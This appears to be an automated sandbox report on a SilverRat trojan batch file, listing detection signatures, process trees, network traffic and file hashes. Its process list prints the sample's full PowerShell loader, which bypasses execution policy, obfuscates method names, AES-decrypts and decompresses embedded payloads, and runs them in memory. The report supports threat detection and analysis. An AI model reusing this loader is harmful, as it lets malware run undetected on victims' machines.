Malware Analysis Report

2025-03-15 01:11

Sample ID 250214-lk4gna1pgk
Target rthingy.bat
SHA256 d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4
Tags
silverrat discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9afd4677b6374d120c2408bdc25c4d5fa2625ece198e0c0eed45960edee89b4

Threat Level: Known bad

The file rthingy.bat was found to be: Known bad.

Malicious Activity Summary

silverrat discovery execution trojan

SilverRat

Silverrat family

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-14 09:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-14 09:36

Reported

2025-02-14 09:39

Platform

win11-20250210-en

Max time kernel

147s

Max time network

150s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"

Signatures

SilverRat

trojan silverrat

Silverrat family

silverrat

Downloads MZ/PE file

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3418141264-4181727730-1624968314-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3904 wrote to memory of 1084 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rthingy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Meo76zIdzGxWzcGjAKAOLGgRVR1B6hHfBtJu6auoogA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ru86nRFMP8Q91uK61+/ow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dAblc=New-Object System.IO.MemoryStream(,$param_var); $shsCO=New-Object System.IO.MemoryStream; $SyeQT=New-Object System.IO.Compression.GZipStream($dAblc, [IO.Compression.CompressionMode]::Decompress); $SyeQT.CopyTo($shsCO); $SyeQT.Dispose(); $dAblc.Dispose(); $shsCO.Dispose(); $shsCO.ToArray();}function execute_function($param_var,$param2_var){ $tTPRa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wQaXC=$tTPRa.EntryPoint; $wQaXC.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rthingy.bat';$lVTof=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rthingy.bat').Split([Environment]::NewLine);foreach ($pGkrh in $lVTof) { if ($pGkrh.StartsWith(':: ')) { $PioZz=$pGkrh.Substring(3); break; }}$payloads_var=[string[]]$PioZz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkNGRkIzNEMtNTAxMC00Njk3LThGMjMtNTVGMjVDOEQyOThCfSIgdXNlcmlkPSJ7NkRCQTg2QzUtMjAyMC00RTcyLTkzMEQtQTg2NkFGQ0FDMjBDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7OEJCMzU4RTYtNkVDNS00RTY3LTgyNjctOTE2NDQ4M0Y5N0Q0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4NDAzMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjU2MjA2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU2MjE1MjgwMzgiLz48L2FwcD48L3JlcXVlc3Q-

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp
NL | 4.175.87.113:443 | msedge.api.cdp.microsoft.com | tcp
US | 199.232.210.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp

Files

memory/1084-0-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttrtiaum.rkg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1084-9-0x000001FEE8440000-0x000001FEE8462000-memory.dmp

memory/1084-10-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-11-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-12-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

memory/1084-14-0x000001FEE84D0000-0x000001FEE84DE000-memory.dmp

memory/1084-13-0x000001FED0320000-0x000001FED0328000-memory.dmp

memory/1084-15-0x000001FEE8500000-0x000001FEE8510000-memory.dmp

memory/1084-18-0x00007FFDA9143000-0x00007FFDA9145000-memory.dmp

memory/1084-19-0x00007FFDA9140000-0x00007FFDA9C02000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 1f2c3f2201f48d8183a4d61d798177e5
SHA1 ff85fab86cb79b8ac862b879ab272d8f9b0bbec4
SHA256 22be5badfa40ffa908d70638e28419b940437e5140925138164bac9a474770e9
SHA512 1597efbb2d05fd309573c529a6a0608d90730d4d90f362c529aaa16d564c7e82b963b06b8d68ee3404a981318c5fcedd0ea5e117e2bc92ed88108864b708d27d

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

MD5 fc6dd02bcc9dcd70d2d2e6f2bf6a8480
SHA1 a804945de20c3c5c7d9e20ba5a29d989f71736fd
SHA256 205cd193614c5c6ecde093110505bd11d404520b992be7f0ebe3bb75c4c7ba4b
SHA512 0852b513ebcfb57cf5da8a10db5cd6723913ebb90ed25efb3d3e8ee1a3ef1e32ae9b41b0ada3505ace90a98938ed4b9d926884b3d9db40a9e74a97aa32625d20